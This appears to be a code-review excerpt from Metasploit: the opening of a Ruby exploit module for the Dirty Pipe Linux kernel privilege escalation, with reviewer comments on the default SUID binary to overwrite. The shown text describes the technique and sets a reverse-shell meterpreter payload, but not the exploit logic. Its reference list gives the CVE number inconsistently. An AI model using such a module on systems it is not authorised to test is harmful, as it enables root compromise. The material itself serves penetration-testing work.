modules/exploits/linux/local/cve_2022_0847_dirtypipe.rb

```diff
@@ -0,0 +1,182 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Local
+  Rank = ExcellentRanking
+
+  include Msf::Post::File
+  include Msf::Post::Linux::Priv
+  include Msf::Post::Linux::Kernel
+  include Msf::Post::Linux::System
+  include Msf::Post::Linux::Compile
+  include Msf::Exploit::EXE
+  include Msf::Exploit::FileDropper
+
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Dirty Pipe Local Privilege Escalation via CVE-2022-0847',
+        'Description' => %q{
+          This exploit targets a vulnerability in the Linux kernel since 5.8, that allows
+          writing of read only or immutable memory.
+
+          The vulnerability was fixed in Linux 5.16.11, 5.15.25 and 5.10.102.
+          The module exploits this vulnerability by overwriting a suid binary with the
+          payload, executing it, and then writing the original data back.
+
+          There are two major limitations of this exploit: the offset cannot be on a page
+          boundary (it needs to write one byte before the offset to add a reference to
+          this page to the pipe), and the write cannot cross a page boundary.
+          This means the payload must be less than the page size (4096 bytes).
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'Max Kellermann', # Original vulnerability discovery
+          'timwr', # Metasploit Module
+        ],
+        'DisclosureDate' => '2022-02-20',
+        'SessionTypes' => ['shell', 'meterpreter'],
+        'Platform' => [ 'linux' ],
+        'Arch' => [
+          ARCH_X64,
+          ARCH_X86,
+          ARCH_ARMLE,
+          ARCH_AARCH64,
+          # ARCH_PPC,
+          # ARCH_MIPSLE,
+          # ARCH_MIPSBE
+        ],
+        'Targets' => [['Automatic', {}]],
+        'DefaultTarget' => 0,
+        'DefaultOptions' => {
+          'AppendExit' => true,
+          'PrependSetresuid' => true,
+          'PrependSetresgid' => true,
+          'PrependSetreuid' => true,
+          'PrependSetuid' => true,
+          'PrependFork' => true,
+          'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'
+        },
+        'Privileged' => true,
+        'References' => [
+          [ 'CVE', '2022-8047' ],
+          [ 'URL', 'https://dirtypipe.cm4all.com' ],
+          [ 'URL', 'https://haxx.in/files/dirtypipez.c' ],
+        ],
+        'Notes' => {
+          'Reliability' => [ REPEATABLE_SESSION ],
+          'Stability' => [ CRASH_SAFE ],
+          'SideEffects' => [ ARTIFACTS_ON_DISK ]
+        }
+      )
+    )
+    register_options([
+      OptString.new('WRITABLE_DIR', [ true, 'A directory where we can write files', '/tmp' ]),
+      OptString.new('SUID_BINARY_PATH', [ false, 'The path to a suid binary', '/usr/bin/sudo' ])
```

Comment:
Maybe use `/bin/passwd` instead, since it's ~always present, while `sudo` might not.

Reply:
`/usr/bin/passwd` works but it blocks if it's not overwritten, whereas sudo returns instantly with the usage.
I'm tempted to remove the default, and have it search for a suitable suid binary if not explicitly set.

Reply:
I went with /usr/bin/passwd, it's less likely to cause system instability and the check method already confirms that overwriting is possible. It's quite stable actually.

Reply:
You meant /bin/passwd not /usr/bin/passwd for a reason right? Presumably all distributions will symlink /bin/passwd to /usr/bin/passwd, but not every distribution will have a /usr/bin/passwd? So /bin/passwd is the most generic